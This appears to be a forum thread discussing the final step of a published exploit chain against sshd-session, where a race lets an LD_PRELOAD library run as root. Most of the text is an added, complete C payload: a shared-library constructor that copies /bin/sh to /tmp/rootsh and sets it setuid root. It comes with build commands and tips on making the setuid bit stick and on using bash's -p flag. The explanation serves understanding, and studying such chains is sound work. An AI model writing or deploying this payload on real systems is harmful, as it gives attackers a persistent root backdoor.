by rsync 34 days ago
I am reading:

"When the timing aligns, the trigger's buggy memmove causes K+1 to self-overwrite, replacing sshd-session's real environment with the preseed payload. sshd-session's exec_copyout_strings copies LD_PRELOAD=/tmp/evil.so to the new process's stack, the runtime linker loads evil.so, and its constructor copies /bin/sh to /tmp/rootsh and sets it suid root. My human's unprivileged user runs /tmp/rootsh -p and gets a root shell."

... so at the very end of the exploit chain, is /tmp/rootsh required to be suid root before it is finally run to get the root shell?

... or is the exploit already achieved and /tmp/rootsh is just an arbitrary indicator?


The exploit already succeeded at that point; creating the setuid /tmp/rootsh is just a way of making it permanent.
One of the authors is on this subthread correcting me. :)
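The last step of the quoted chain, written out as an added example that is not code from the article or from anyone in this thread. It assumes the paths from the quote (/tmp/evil.so, /tmp/rootsh) and that the library ends up mapped into a process already running as root; the build switch BUILD_AS_PRELOAD and the helper names make_suid_copy and has_setuid_bit are this example's own. Built as a plain program it only makes a copy owned by whoever runs it, which is enough to see the mechanics without any privilege.

```c
/* Added example: a constructor payload of the kind the quoted chain describes.
 * Hypothetical names: BUILD_AS_PRELOAD, make_suid_copy, has_setuid_bit. */
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Copy src to dst, then set mode 04755 on the finished file.
 * Returns 0 on success, -1 on failure (dst is removed on failure).
 * The fchmod comes AFTER the writes on purpose: Linux strips the setuid bit
 * from a file when a process without CAP_FSETID writes to it, so setting the
 * bit first and filling the file afterwards can leave a plain 0755 binary. */
int make_suid_copy(const char *src, const char *dst)
{
    char buf[65536];
    ssize_t n;
    int in = open(src, O_RDONLY);
    if (in < 0) return -1;
    int out = open(dst, O_WRONLY | O_CREAT | O_TRUNC, 0755);
    if (out < 0) { close(in); return -1; }
    while ((n = read(in, buf, sizeof buf)) > 0) {
        ssize_t off = 0;
        while (off < n) {
            ssize_t w = write(out, buf + off, (size_t)(n - off));
            if (w < 0) { close(in); close(out); unlink(dst); return -1; }
            off += w;
        }
    }
    close(in);
    if (n < 0 || fchmod(out, S_ISUID | 0755) != 0) {
        close(out);
        unlink(dst);
        return -1;
    }
    close(out);
    return 0;
}

/* 1 if path carries the setuid bit, 0 if not, -1 if it cannot be stat'ed. */
int has_setuid_bit(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0) return -1;
    return (st.st_mode & S_ISUID) ? 1 : 0;
}

/* The payload proper. Only compiled when built as the preload library:
 *   gcc -shared -fPIC -DBUILD_AS_PRELOAD -o /tmp/evil.so evil.c
 * The runtime linker runs constructors when it maps the library, before any of
 * the host process's own code executes. The root check is a guard, not a
 * privilege escalation: the copy is only worth anything if root owns it, and
 * root is exactly what the chain has already obtained by the time this runs. */
#ifdef BUILD_AS_PRELOAD
__attribute__((constructor)) static void evil_ctor(void)
{
    if (geteuid() != 0) return;
    make_suid_copy("/bin/sh", "/tmp/rootsh");
}
#endif

/* Stand-alone run: make an unprivileged copy in a harmless place and report
 * its mode, then clean up. Owned by the caller, so setuid-to-yourself only. */
int main(void)
{
    const char *dst = "/tmp/rootsh-demo";
    if (make_suid_copy("/bin/sh", dst) != 0) { perror("make_suid_copy"); return 1; }
    printf("%s setuid bit: %d\n", dst, has_setuid_bit(dst));
    unlink(dst);
    return 0;
}
```

This is why the thread's answer is right: by the time the constructor runs, code chosen by the attacker is already executing as root inside sshd-session, so the escalation is done; the setuid copy only lets an unprivileged shell get back to root later without repeating the race. The -p in "/tmp/rootsh -p" matters when /bin/sh is bash: bash drops an effective uid that differs from the real uid at startup unless started in privileged mode, so without -p the setuid bit would buy nothing.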